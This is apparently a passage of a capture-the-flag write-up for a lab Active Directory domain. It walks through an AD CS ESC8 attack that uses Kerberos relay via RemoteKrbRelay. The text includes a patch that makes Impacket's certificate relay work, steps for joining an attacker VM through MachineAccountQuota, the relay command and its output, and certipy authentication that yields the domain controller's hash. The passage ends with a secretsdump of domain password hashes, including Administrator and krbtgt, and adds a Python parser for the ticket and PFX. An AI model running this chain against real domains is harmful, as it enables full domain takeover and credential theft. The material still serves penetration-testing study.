[*] SMBD: Received connection from 10.129.234.48
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.234.48
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] GOT CERTIFICATE! ID 90
Exception in thread Thread-5:
Traceback (most recent call last):
File "/usr/lib/python3.13/threading.py", line 1041, in _bootstrap_inner
self.run()
~~~~~~~~^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 42, in run
ADCSAttack._run(self)
~~~~~~~~~~~~~~~^^^^^^
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 81, in _run
certificate_store = self.generate_pfx(key, certificate)
File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 113, in generate_pfx
p12 = crypto.PKCS12()
^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 68, in __getattr__
obj = getattr(self._module, attr)
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Patching generate_pfx() in Impacket's adcsattack.py (the path is in the traceback) as follows fixes it:
# Original method in impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py
# (crypto is pyOpenSSL's OpenSSL.crypto, already imported by that module):
    def generate_pfx(self, key, certificate):
        certificate = crypto.load_certificate(crypto.FILETYPE_PEM, certificate)
        p12 = crypto.PKCS12()
        p12.set_certificate(certificate)
        p12.set_privatekey(key)
        return p12.export()

# ========= replace it with the following =========
    def generate_pfx(self, key, certificate):
        from cryptography.hazmat.primitives import serialization
        from cryptography.hazmat.primitives.serialization import pkcs12
        # Convert the PEM certificate into a cryptography object
        cert_pem = certificate.encode() if isinstance(certificate, str) else certificate
        cert_obj = crypto.load_certificate(crypto.FILETYPE_PEM, cert_pem)
        cryptography_cert = cert_obj.to_cryptography()
        # Convert the pyOpenSSL private key (crypto.PKey) into a cryptography object
        # (key.to_cryptography_key() does the same in one call on recent pyOpenSSL)
        key_pem = crypto.dump_privatekey(crypto.FILETYPE_PEM, key)
        cryptography_key = serialization.load_pem_private_key(key_pem, password=None)
        # Build an unencrypted PKCS#12 blob; certipy auth -pfx reads it as-is
        p12_data = pkcs12.serialize_key_and_certificates(
            name=b"",
            key=cryptography_key,
            cert=cryptography_cert,
            cas=None,
            encryption_algorithm=serialization.NoEncryption(),
        )
        return p12_data
1.4.2. ESC8 on Windows
1. NTLM self-relay mitigation
In a textbook ESC8 attack, when the DC and the AD CS web enrollment service run on the same host, the flow becomes a self-relay:
- coerce machine A (the DC) into authenticating to the attacker;
- forward that authentication back to machine A's own web interface.
Microsoft's NTLM reflection protections (MS08-068 and the hardening that followed) recognise this same-host authentication loop and reject it, so the NTLM relay fails.
2. Workaround: Kerberos relay (ESC8, the hard way)
Recent research shows that relaying Kerberos instead of NTLM sidesteps the restriction, which is specific to NTLM.
- Tool: RemoteKrbRelay (CICADA8 Research Team). It relays Kerberos authentication obtained over DCOM/RPCSS to the web enrollment interface.
- Prerequisite: it runs on Windows and needs a legitimate domain machine/user context.
3. Exploitation strategy:
Because a domain normally lets ordinary users join machines (MachineAccountQuota defaults to 10), an attacker can:
- use the captured domain credentials (rosie.powell here) to join their own Windows VM to the target domain;
- log in on that VM with the domain account and run RemoteKrbRelay;
- coerce the DC into authenticating, relay the Kerberos authentication to AD CS and obtain the DC's certificate (.pfx/PKCS12), then escalate with it.
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# nxc ldap DC-JPQ225.cicada.vl -k --use-kcache -M maq
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] None (name:DC-JPQ225) (domain:CICADA.VL) (signing:None) (channel binding:Never) (NTLM:False)
LDAP DC-JPQ225.cicada.vl 389 DC-JPQ225 [+] CICADA.VL\rosie.powell from ccache
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 [*] Getting the MachineAccountQuota
MAQ DC-JPQ225.cicada.vl 389 DC-JPQ225 MachineAccountQuota: 10
With MachineAccountQuota at 10, we can join our own Windows VM to the domain.
1.4.2.1. Joining the local Windows VM to the domain
Point the VM's DNS at the DC.
Then rename the computer and join it to the domain.
Enter the domain credentials when prompted.
After the reboot, log in as the local administrator first to bring the VPN up, then use Switch user to sign in as rosie.powell.
1.4.2.2. Kerberos Relay via RemoteKrbRelay
Then run RemoteKrbRelay on that VM, in the rosie.powell session:
RemoteKrbRelay.exe -adcs -template DomainController -victim dc-jpq225.cicada.vl -target dc-jpq225.cicada.vl -clsid d99e6e74-fc88-11d0-b498-00a0c90312f3
/\_/\____,
,___/\_/\ \ ~ /
\ ~ \ ) XXX
XXX / /\_/\___,
\o-o/-o-o/ ~ /
) / \ XXX
_| / \ \_/
,-/ _ \_/ \
/ ( /____,__| )
( |_ ( ) \) _|
_/ _) \ \__/ (_
(,-(,(,(,/ \,),),)
CICADA8 Research Team
From Michael Zhmaylo (MzHmO)
[+] Setting UP Rogue COM at port 12345
[+] Registering...
[+] Register success
[+] Forcing Authentication
[+] Using CLSID: d99e6e74-fc88-11d0-b498-00a0c90312f3
[*] apReq: 6082071f06092a864886f71201020201006e82070e3082070aa003020105a10302010ea20703050020000000a3820546618205423082053ea003020105a10b1b094349434144412e564ca2263024a003020102a11d301b1b04687474701b1364632d6a70713232352e6369636164612e766ca3820500308204fca003020112a103020105a28204ee048204ea56acc6e09b7c959cc8edcec89121dc9c9105c7d9810223a3c16c9697c1b5da459300e5123906b0694be768bc2454ca1cf5faf529e28764193e18a2a987c863402f1d617f07891d583f3bbe9674119677a4c08160f964a02fd7fc5f9acde246cc610878bc6c6346bfde4d8da99f3ddc65fccf59008272c9d5dd4c9959f9e4b3093868e0bfeea7e6d9003a0da394250d7209272a0b6ec56ad77625f7d6de746422b29055869640dd360045d9f6b995068b8c638cea666d007127359626191021b665426e4080cb8470e05890750d8cf7aa3f4259d0dfaa505c9f6fa8604ec56fd465939f008a5dece81155c01dc601c998c149c6560e42d5635cdce5ea0fb7a32fe0c2e4260bc98871a660c333adf7cdc19e44da13f29797febfc78bb738cb3befb1de3dd8cba4c1ebaf0fa659471754695295b4778a006cafe50926cc96b1c84173608998ee055f848d27f8312e35f0b7b797f8134ef84a6d22b593557c761ddef4d18316842a7162a99ae37ae808a9493caaed6edf1c46d0d75312fd6a744aa5c9ec2f6aadd0b3b859d0facdff07015d40d834daa88969d4def4788678438a0c639b4710c2cca5fe288efbb38a5a45b23cc41caff13a4bf9d99a9e137d6c30dc1616912133b6e577ba12d6e348da5471e8c143057b6ac30bfceb4ca07d6abcdbb5e232eeb443c41f63f96c0a901792c5c71728ad8c26ed2415b442cd96be537eb0222b7f7e5a267f071543219e8d5d299974ec54dae12d09aa21301bd66ac52148a03d49bc0788cc7820966e76e5cdead531957298d6af1830a4e0e1aaa3bc801be9375b3dc2a8c64d2beb3f7f34357f5ec7629e7bd51a1ec02660d74cfe42bbc1e1e2f34858f9f3bd0211b698cd7149ad4e4bf8e7a3275f2a88e24d1980225d8e44c93d5f5ea21726665dd6686aa1fbc572e498774a20382ebc453e9641fccf273f5ce1f102046dc585d4ca219f1bf9dbcbc53a73a84fc0a0d2187f3f23814e65cef07597d95420dcde95c96c8d97c91ac33e8bcdd4063e886a55cc0ed29dfa9d276c0da01dadeb5d2b08a3063f65493344e829398e1b20787b529a33d8b6c49cb27d3e74961d86518d91b4f1d61631a492e6a528ee41b5297c9bdbec9efa753d3d0177f7c0ff54110a6aebcba25fff2db4ba7a06fc42324e308705b06d4e931c1efbca2e9cc290726ee0712a38857f9ae4af9f1fb81
319204e0293e5c98d23af8573544d596bbc51f8368f7da6c14f0d7c2655787ed15e237384e919a3f4c343c014ed7b4707e8b69071de782d240b3c3aef5354dba4a0701c58855edd609c69234070ac250e68af1d00debe6f2d28525f2a21619e65de9f0b52ad67eae2d7a82dab9a70e6ff71050fb4a54dcf89ce2bf45e525dfe02f6a1d6be056ac848d5aaae4e4e2e2c77d5ee9ded1eebe1b5b850c35df0d561226655f3e2bf9b9603a92425e8257c50fe08441a44e4a9ab31c9f88915110556923d199f21e921f02017bf5fd35c436013ae097584a5e29040da3914801120cf64a1c14f8757b6d5b53c2060131e01155ab6b9b615010ead6e19d1f67d0227885d15a6a3e82e9e8de9ef56cd1022cea71376f7cd7e3421c81b66539104f5af7652229d9f6c0eb5282cf2c1dd54594ba62f55425c82da598956f8bfb1379439d3334295031785a6d26c4e0ccb03b55b4a1bd7f491cdb5fad6f23e0da13674e6208122c21516cb1fcc693d21fb6278899673144bd74621e3de933ee586545d017e4da4f9a39dd6ecc3a3815447080717e7de92abdfa48201a9308201a5a003020112a282019c04820198f0b165e6a0844db865f452ab292612be96f00bea63f4a5a14c03190fb3f0b68eb70e9769b6d282f76dae6503539b79a0c2b4674ea73ce615e5235541c8de73c660eeb1d79857742d9c14a19f3525c56c052ab6c72708f34d6434daa02a85323bd5232a37027c01bd1d73eef8919da7eb9646796b1a7e7d43c03fcf628483b8069ee72a2fe0c743e69f790d328ac2336213f22bd36e7aacd03d58169f7394e543c45b89c1413af524a63a0cdeb7abaabe323521677811a9f8245bc24e597a39b84b034472d00195c77fa5a33bb1521e5b744b2283503d7ee6dad68c213300db58155b6f03ea9ebbcf9798d139c093139efb8e2751b64b539fd9a20f758b4cd4dfd3167e35c35ecaa8450fcbf36111ff98fc998af6f2934592485a960a9b601ff2f34466396efcbfeacdc1bb8203b9b4eeede65402bfa9f8701515834a0a1ea7784003fdb9fa4eacf1a6997cbe60f8f8d314fd19016d59a35bde012cf1fcb8c980f6f85a4b887a831cd45d76ca1ed8683c73d44d7d2febc72f18a6869fc61d526147ba10bb2ee1f57ae01df9829b9be6ef0225c6725fc25c2b
[+] Got Krb Auth from NT/System. Relaying to ADCS now...
[*] AcceptSecurityContext: SEC_I_CONTINUE_NEEDED
[*] fContextReq: Delegate, MutualAuth, ReplayDetect, SequenceDetect, Confidentiality, UseDceStyle, Connection
[+] Received Kerberos Auth from dc-jpq225.cicada.vl with ticket on http/dc-jpq225.cicada.vl
[*] apRep2: 6f5b3059a003020105a10302010fa24d304ba003020112a24404424f5ad68bf96bd0dccb216d9f88d4e9138a94aced2822098d48f44acb41b5dab5b7d7546e8c218593f3b9b59f743f4eb0f5406fc7d487f8441d35374de65093fa15a8
[+] HTTP session established
[+] Cookie ASPSESSIONIDAQTTQACB=GNKPMNIAKIEBCEMEMMDCKJCI; path=/
[+] Lets get certificate for "cicada.vl\dc-jpq225$" using "DomainController" template
[+] Success (ReqID: 90)
[+] Certificate in PKCS12: <base64 PKCS#12 blob, omitted here>
Back on Kali with the VPN up, convert the base64 PKCS12 into a .p12 (.pfx) file:
echo -ne "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B..." | base64 -d > cert.p12
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# file cert.p12
cert.p12: data
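Two checks worth doing at this point, as an added example of my own (not code from the writeup, RemoteKrbRelay, krbrelayx or certipy; standard library only): walk the BER of the apReq hex that RemoteKrbRelay printed above to confirm the realm, SPN, enctype and kvno of the ticket the DC handed over (the tool's own summary line says http/dc-jpq225.cicada.vl; the bytes say the same, AES256, kvno 5), and base64-decode the PKCS#12 blob in a paste-tolerant way before checking its outer header. The header check also explains the "data" verdict from file: Windows emits the PFX as BER with indefinite lengths (30 80 ...), which is valid and which certipy accepts, but which file's magic does not recognise. The embedded samples are the leading bytes of the page's own apReq dump and base64 string, truncated; both parsers read only the headers, so truncation does not matter.

```python
import base64
import re

KRB5_MECH_OID = "1.2.840.113554.1.2.2"   # GSS-API Kerberos V5 mechanism OID
PKCS7_DATA_OID = "1.2.840.113549.1.7.1"  # PFX authSafe contentType (id-data)

# Leading bytes of the apReq dump RemoteKrbRelay printed above, truncated: the walker never
# touches the cipher text, so a cut-off dump still yields every header field we care about.
APREQ_PREFIX = (
    "6082071f" "06092a864886f712010202" "0100"  # GSS token, Kerberos V5 OID, TOK_ID KRB_AP_REQ
    "6e82070e3082070a" "a003020105a10302010e"   # AP-REQ [APPLICATION 14] SEQUENCE, pvno 5, msg-type 14
    "a20703050020000000"                        # [2] ap-options BIT STRING
    "a3820546618205423082053e" "a003020105"     # [3] ticket: Ticket [APPLICATION 1] SEQUENCE, tkt-vno 5
    "a10b1b094349434144412e564c"                # [1] realm
    "a2263024a003020102a11d301b1b04687474701b1364632d6a70713232352e6369636164612e766c"  # [2] sname
    "a3820500308204fca003020112a103020105a28204ee048204ea56acc6e09b7c"  # [3] enc-part, cut short
)
# Start of the base64 PKCS#12 string that the page pipes into 'base64 -d' (truncated).
PFX_B64_PREFIX = "MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqhkiG9w0B"

def tlv(buf, off):
    """BER tag/length at buf[off] -> (tag, length, content_off, indefinite); length is None for 0x80."""
    tag, first = buf[off], buf[off + 1]
    if first == 0x80:                      # indefinite form, as in Windows-exported PFX files
        return tag, None, off + 2, True
    if first < 0x80:
        return tag, first, off + 2, False
    n = first & 0x7F
    return tag, int.from_bytes(buf[off + 2:off + 2 + n], "big"), off + 2 + n, False

def decode_oid(raw):
    arcs, value = [raw[0] // 40, raw[0] % 40], 0
    for b in raw[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def ctx_fields(buf, off, count):
    """Read `count` consecutive [n] EXPLICIT fields of a SEQUENCE -> {n: (content_off, len)}."""
    out = {}
    for _ in range(count):
        tag, ln, coff, _ = tlv(buf, off)
        out[tag & 0x1F] = (coff, ln)
        off = coff + ln
    return out

def content(buf, off):
    # raw content bytes of the element sitting inside an EXPLICIT wrapper
    _, ln, coff, _ = tlv(buf, off)
    return buf[coff:coff + ln]

def parse_ap_req(hexdump):
    """Summarise the ticket inside a GSS-API wrapped KRB_AP_REQ (RFC 4121 4.1, RFC 4120 5.5.1)."""
    buf = bytes.fromhex("".join(hexdump.split()))   # tolerate a console dump wrapped over lines
    tag, _, off, _ = tlv(buf, 0)
    _, ln, off, _ = tlv(buf, off)
    mech, off = decode_oid(buf[off:off + ln]), off + ln
    if tag != 0x60 or mech != KRB5_MECH_OID or buf[off:off + 2] != b"\x01\x00":
        raise ValueError("not a GSS-API wrapped Kerberos V5 KRB_AP_REQ")
    _, _, off, _ = tlv(buf, off + 2)                 # AP-REQ [APPLICATION 14]
    _, _, off, _ = tlv(buf, off)                     # SEQUENCE
    req = ctx_fields(buf, off, 4)                    # pvno, msg-type, ap-options, ticket
    mutual_required = bool(content(buf, req[2][0])[1] & 0x20)   # ap-options bit 2
    _, _, toff, _ = tlv(buf, req[3][0])              # Ticket [APPLICATION 1]
    _, _, toff, _ = tlv(buf, toff)                   # SEQUENCE
    tkt = ctx_fields(buf, toff, 4)                   # tkt-vno, realm, sname, enc-part
    _, _, soff, _ = tlv(buf, tkt[2][0])              # PrincipalName SEQUENCE
    sname = ctx_fields(buf, soff, 2)                 # name-type, name-string
    _, ln, p, _ = tlv(buf, sname[1][0])              # SEQUENCE OF GeneralString
    parts, end = [], p + ln
    while p < end:
        _, n, c, _ = tlv(buf, p)
        parts.append(buf[c:c + n].decode("ascii"))
        p = c + n
    _, _, eoff, _ = tlv(buf, tkt[3][0])              # EncryptedData SEQUENCE
    enc = ctx_fields(buf, eoff, 2)                   # etype, kvno (cipher is never read)
    return {"realm": content(buf, tkt[1][0]).decode("ascii"), "spn": "/".join(parts),
            "name_type": content(buf, sname[0][0])[0], "etype": content(buf, enc[0][0])[0],
            "kvno": content(buf, enc[1][0])[0], "mutual_required": mutual_required}

def b64_to_der(text):
    """Decode console-pasted base64: drop line breaks, spaces and prompt fragments, fix '=' padding."""
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", text)
    return base64.b64decode(cleaned + "=" * (-len(cleaned) % 4))

def inspect_pkcs12_header(der):
    """Check the outer PFX layout (RFC 7292 4): SEQUENCE { version 3, authSafe ContentInfo, ... }."""
    tag, _, off, indefinite = tlv(der, 0)
    if tag != 0x30:
        raise ValueError("PFX must start with a SEQUENCE")
    _, ln, coff, _ = tlv(der, off)                   # version INTEGER
    version = int.from_bytes(der[coff:coff + ln], "big")
    _, _, off, _ = tlv(der, coff + ln)               # authSafe ContentInfo SEQUENCE
    tag, ln, coff, _ = tlv(der, off)                 # contentType OID
    content_type = decode_oid(der[coff:coff + ln]) if tag == 0x06 else None
    return {"version": version, "content_type": content_type, "indefinite_length": indefinite,
            "looks_like_pkcs12": version == 3 and content_type == PKCS7_DATA_OID}
```

On a real run, paste RemoteKrbRelay's complete apReq line into parse_ap_req() and the complete base64 blob into b64_to_der(), write the returned bytes to cert.p12 and hand that to certipy; looks_like_pkcs12 should be True, and indefinite_length True is exactly why file says "data". If the SPN in the ticket is not a service class of the DC's machine account, the relay against /certsrv will not succeed regardless of what the tool reports.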
Then request a TGT with it:
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# certipy auth -pfx cert.p12 -dc-ip 10.129.200.138 -domain cicada.vl
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'DC-JPQ225.cicada.vl'
[*] Security Extension SID: 'S-1-5-21-687703393-1447795882-66098247-1000'
[*] Using principal: 'dc-jpq225$@cicada.vl'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'dc-jpq225.ccache'
[*] Wrote credential cache to 'dc-jpq225.ccache'
[*] Trying to retrieve NT hash for 'dc-jpq225$'
[*] Got hash for 'dc-jpq225$@cicada.vl': aad3b435b51404eeaad3b435b51404ee:a65952c664e9cf5de60195626edbeee3
┌──(root㉿kali)-[~/Desktop/htb/VulnCicada]
└─# impacket-secretsdump -k -no-pass DC-JPQ225.cicada.vl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:85a0da53871a9d56b6cd05deda3a5e87:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:8dd165a43fcb66d6a0e2924bb67e040c:::
cicada.vl\Shirley.West:1104:aad3b435b51404eeaad3b435b51404ee:ff99630bed1e3bfd90e6a193d603113f:::
cicada.vl\Jordan.Francis:1105:aad3b435b51404eeaad3b435b51404ee:f5caf661b715c4e1435dfae92c2a65e3:::
cicada.vl\Jane.Carter:1106:aad3b435b51404eeaad3b435b51404ee:7e133f348892d577014787cbc0206aba:::
^C[-]
Delete resume session file? [y/N] n
[*] Cleaning up...